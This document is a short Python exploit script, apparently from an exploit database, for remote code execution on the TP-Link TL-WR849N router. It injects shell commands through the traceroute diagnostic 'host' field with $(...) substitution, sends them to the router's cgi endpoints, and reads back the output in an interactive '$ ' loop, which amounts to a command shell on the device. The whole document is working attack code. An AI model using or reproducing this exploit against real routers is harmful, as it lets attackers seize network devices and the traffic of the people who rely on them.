TP LINK TL-WR849N - Remote Code Execution

1. import requests
2.  
3. def output(headers,cookies):
4.     url = 'http://192.168.0.1/cgi?1'
5.     data = ''
6.     data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
7.     data += 'diagnosticsState\x0d\x0a'
8.     data += 'X_TP_HopSeq\x0d\x0a'
9.     data += 'X_TP_Result\x0d\x0a'
10.     r = requests.post(url,data=data,headers=headers,cookies=cookies)
11.     saida = r.text
12.     filtro = saida.replace(': Name or service not known','')
13.     filtro = filtro.replace('[0,0,0,0,0,0]0','')
14.     filtro = filtro.replace('diagnosticsState=','')
15.     filtro = filtro.replace('X_TP_HopSeq=0','')
16.     filtro = filtro.replace('X_TP_Result=','')
17.     print(filtro[:-8])
18.  
19. def aceppt(headers,cookies):
20.     url = 'http://192.168.0.1/cgi?7'
21.     data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'
22.     r = requests.post(url,data=data,headers=headers,cookies=cookies)
23.     output(headers,cookies)
24.  
25.  
26. def inject(command,headers,cookies):
27.     url = 'http://192.168.0.1/cgi?2'
28.     data = ''
29.     data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a'
30.     data += 'maxHopCount=20\x0d\x0a'
31.     data += 'timeout=5\x0d\x0a'
32.     data += 'numberOfTries=1\x0d\x0a'
33.     data += 'host=\"$('+command+')\"\x0d\x0a'
34.     data += 'dataBlockSize=64\x0d\x0a'
35.     data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a'
36.     data += 'diagnosticsState=Requested\x0d\x0a'
37.     data += 'X_TP_HopSeq=0\x0d\x0a'
38.     r = requests.post(url,data=data,headers=headers,cookies=cookies)
39.     aceppt(headers,cookies)
40.  
41.  
42.  
43. def main():
44.     cookies = {"Authorization": "Basic REPLACEBASE64AUTH"}
45.     headers = {'Content-Type': 'text/plain',
46.       'Referer': 'http://192.168.0.1/mainFrame.htm'}
47.     while True:
48.         command = input('$ ')
49.         inject(command,headers,cookies)
50.  
51.  
52. main()